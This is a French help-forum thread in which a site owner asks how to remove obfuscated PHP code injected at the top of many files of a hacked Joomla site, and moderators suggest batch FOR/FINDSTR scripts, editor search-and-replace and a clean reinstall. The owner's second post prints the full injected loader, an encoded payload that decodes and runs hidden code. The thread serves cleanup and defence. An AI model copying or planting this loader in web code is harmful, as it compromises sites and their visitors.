Menu

Site Hacké avec injection code PHP

Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
- - Dernière réponse : tchao57
Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
- 15 oct. 2018 à 11:49
Bonjour à tous,

je viens vous voir aujourd'hui car j'ai un site qui a été hacké avec de l'injection de code PHP dans les pages.

J'ai pu remarqué que beaucoup de pages PHP avaient été touchées mais pas toutes. Le code injecté se situe toujours en haut du fichier PHP avec les balises <?php et ?> et le code à l'intérieur.

Ce que je souhaiterai faire c'est de supprimer tout ce code dans toutes les pages en une seule fois. J'ai pas regardé toutes les pages mais le code semble être similaire à chaque fois.

Pour cela j'ai téléchargé l'entièreté du fichier "www" sur mon ordinateur. Je fais une recherche Windows de tous les fichiers PHP en tapant *.php, et donc je me retrouve avec tous les fichiers avec extension PHP qu'il y a dans le dossier "www".

Maintenant il faudrait que je puisse faire en sorte de supprimer tout ce qui se trouve entre les balises PHP de ces fichiers, mais sans toucher au reste du code PHP bien sur.

Je ne sais pas trop si je poste dans le bon forum, si ce n'est pas le cas désolé je changerai.

Merci d'avance pour votre aide.
Afficher la suite 

Votre réponse

4 réponses

Messages postés
23661
Date d'inscription
mercredi 2 mai 2007
Statut
Modérateur
Dernière intervention
7 décembre 2018
0
Merci
Bonjour,

Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.

Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
tchao57
Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
-
Bonjour jee pee et merci pour la réponse.

Voici le code que je trouve dans mes pages PHP:

<?php $eidecok = '24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x246Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5cubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovgfxpmpusut!-#j0#!/!**#t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`" x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu>?*2b%)gpf{jt)!gj!<*2bo); $qvlbdqs();}}]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-b<**#57]38y]47]67y]37]88yt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<XA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]3#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qjvt-#w#)ldbqov>*ofmy%);!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22epmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj#H#-#I#-#K#-#L#-#M#-##-#Y#-#D#-#W#-#C#-#O#-#N#*-bssbz)_x2425 x24- x24-!% x24- x24*!|! x24- x24if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]SERVER[" x48 124 x54 120 x5f 125 xU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MS%:|:**t%)m%=*h%)m%):fmjix8:56985:6197g:74985-rr.93e:5597f-s.95h%/#0#/*#npd/#)rrd/#00;qpdof.)fepdof./#@#/qp%>5h%!<*::::tjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7(!isset($GLOBALS[" x61 156 x75 1 x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6x27tfs%6<*17-SFEBFI,6<*127-UVPFNJb%!**X)ufttj x22)gj!|!*nbsbq%) x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! xA)qj3hopmA x273qj%6<*msvd}+;!>!} x27;!>>>!}_;gvc%}&q%7/7#@#7/7^#iubq# x5cq%FGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!id%)ftpmdR6<*id%)dfyfR t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd193`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7f]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gjppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%sgj!<**2-4-bubE{h%)sutcvubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,344ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%*#cd2bge56+99386c6f+9f5d816:+946:ce44#- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdY%)fnbozcYufhA x272qj%6<^#zsfvr# x5c275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*# x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zL1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&epnbss-%rxW~!Ypp2)%zB%z>! x24/%58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7*+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)! x22)!gj}1~!<2p% x7f!~!<#!%ff2-!%t::**<(<!fwbm)%tjw)# x24jw!>!#]y84]275]y83]242]48y]#>m%:|:*r%:-t%)3oftmbg!osvufs!|ftmf!~<**9.-j%56 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_%<#462]47y]252]18y]#>q%<#762]67y]562]38y]57*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce#-!#]y38#-!%w:**<")));$qvlbdqs = $xppyyai("", $dzmxeu<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfs-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2epc}A;~!} x7f;!|!}{;)gj}l;33bq}k;#!>!2p%Z<^2 x5c2b%!>!2p%!*3uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fex7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d! x242178}527}88:}334}472 x24<!%ff2!>!opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z23zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>53 105 x52 137 x41 107 x45 116 x54")zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSrting(0); $dzmxeuo = implode(array_map("hvxgblk",str_split("%t7eu{66~67<&w6<*&7-#o]s]o]s]#)f::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)s," x72 166 x3a 61 x31"))) { $xppyyai = utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!32M3]317]445]212]445]43]321]464]284]364]6]234]342],j%>j%!<**3-j%-bubE{h%)sutcw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sfopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#).fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]y83]256]y81]265]y72]254]y76dXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<:>1<%j:=tj{fpg)%s:*<%V,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!> x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-]27]28y]#/r%/h%)n%-#+I#)q%:>:r2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:f:opjudovg<~ x24<!%o:!>%w6Z6<.2`hA x27pd%6<C x27pd%6|6.%7> x2272qj%)7gj6<**2qj%)hopm3qj*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#nction hvxgblk($n){return chr(ord($n)-1);} @error_repogj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV *^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsrebyeqo'; $efljqgf=explode(chr((837-717)),substr($eidecok,(30712-24835),(208-174))); $krzjtyaj = $efljqgf[0]($efljqgf[(4-3)]); $ndezrekqr = $efljqgf[0]($efljqgf[(12-10)]); if (!function_exists('acfsfeo')) { function acfsfeo($gibxsim, $kckessqqs,$anjnapj) { $lfiushpz = NULL; for($ddxshxcnb=0;$ddxshxcnb<(sizeof($gibxsim)/2);$ddxshxcnb++) { $lfiushpz .= substr($kckessqqs, $gibxsim[($ddxshxcnb*2)],$gibxsim[($ddxshxcnb*2)+(3-2)]); } return $anjnapj(chr((29-20)),chr((434-342)),$lfiushpz); }; } $fitiqvxv = explode(chr((271-227)),'1124,59,1599,32,3687,69,1348,34,4368,35,2855,57,4598,39,352,66,5632,54,4459,24,4483,38,3615,21,4990,29,834,35,54,64,5520,32,4521,30,991,37,3085,63,2912,60,2972,31,723,42,869,52,5552,32,1812,21,3003,36,1863,24,1631,57,3885,55,5019,55,4921,69,1992,23,1688,33,1382,34,5095,40,2119,43,4749,70,288,64,1833,30,2334,42,5135,52,3659,28,3940,64,523,60,2603,43,4722,27,921,21,4637,35,2580,23,607,65,170,51,3558,25,4037,27,418,22,672,51,1477,25,4064,48,1502,32,4551,47,221,21,1923,69,5774,68,2753,38,4403,56,1887,36,4317,51,1721,30,4248,69,5842,35,3354,59,942,49,2057,62,3039,46,2376,46,3506,52,5686,48,4112,53,3148,67,4876,45,3251,54,4004,33,4203,45,118,52,2709,44,242,46,5428,69,583,24,5279,30,1416,25,4819,57,3756,43,3636,23,5497,23,4165,38,1077,47,5223,56,2469,53,1751,61,0,54,2791,64,2015,42,3799,33,5584,48,2646,63,3413,31,1183,52,3215,36,1534,65,1441,36,2422,47,457,66,2269,65,3305,49,2162,50,1235,51,2212,57,765,69,1286,62,4672,50,3444,62,5734,40,5074,21,2522,58,5187,36,5309,57,5366,62,1028,49,3583,32,3832,53,440,17'); $uhivuu = $krzjtyaj("",acfsfeo($fitiqvxv,$eidecok,$ndezrekqr)); $krzjtyaj=$eidecok; $uhivuu(""); $uhivuu=(582-461); $eidecok=$uhivuu-1; ?>


Comment peut-on utiliser la commande FOR et skip?
Commenter la réponse de jee pee
Messages postés
23661
Date d'inscription
mercredi 2 mai 2007
Statut
Modérateur
Dernière intervention
7 décembre 2018
0
Merci
On dirait qu'il n'y a pas de caractère de fin de ligne, cela peut poser problème.

Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner

@echo off
cd D:\Dev\Batch\b2\dira
FOR /F "skip=1 tokens=1* delims=€" %%A IN (php2.php) DO echo %%A >>newphp2.php
pause 


et aussi pour essayer de déterminer les fichiers concernés

@echo off
cd D:\Dev\Batch\b2\dira
FOR /R %%i IN (*.php) DO FINDSTR /M "eidecok" %%i && echo ok %%i
pause


si tout colle, il faudra combiner les 2

Commenter la réponse de jee pee
0
Merci
Sinon, tu peux ouvrir tous les fichiers .php dans notepad++ et dans la fonction remplacer, tu colle ce que tu veux supprimer et dans remplacer tu ne met rien. Cela effacera le code en question dans tous les php à condition qu'ils soient ouverts dans NP++ et que tu remplaces avec "remplacer dans tous les documents ouverts".
jordane45
Messages postés
23534
Date d'inscription
mercredi 22 octobre 2003
Statut
Modérateur
Dernière intervention
7 décembre 2018
-
Bonjour,
Ou il peut aussi ouvrir son dossier www dans netbeans et effectuer un rechercher remplacer directement dans toute l'arborescence (en filtrant, en plus, si il le souhaite, sur le fichiers php).
Commenter la réponse de Tartine
Messages postés
23022
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
4 décembre 2018
0
Merci
pas de sauvegarde récente avant cet événement ???
tchao57
Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
-
Non, malheureusement la personne qui gérait le site n'y avait...pas pensé...
Mais bon pas grave je vais réinstaller un Joomla tout neuf et retélécharger tous les composants et modules puis remettre la base de donnée. Ça nettoiera toute la vérole.
Judge_DT
Messages postés
25573
Date d'inscription
vendredi 5 février 2010
Statut
Modérateur
Dernière intervention
7 décembre 2018
> tchao57
Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
-
Et... qui dit que la base de données, n'a pas elle aussi été vérolée ? ;-\
tchao57
Messages postés
592
Date d'inscription
dimanche 12 avril 2009
Dernière intervention
15 octobre 2018
-
Non je n'ai pas l'impression. Aucune nouvelle table n'est créée et tout semble aller à l'intérieur.
J'ai déjà fait un transfert sous wamp et tout roule. Pour l'instant... :)
Commenter la réponse de bg62
Jessica Spotswood | Download | Nicolas Cage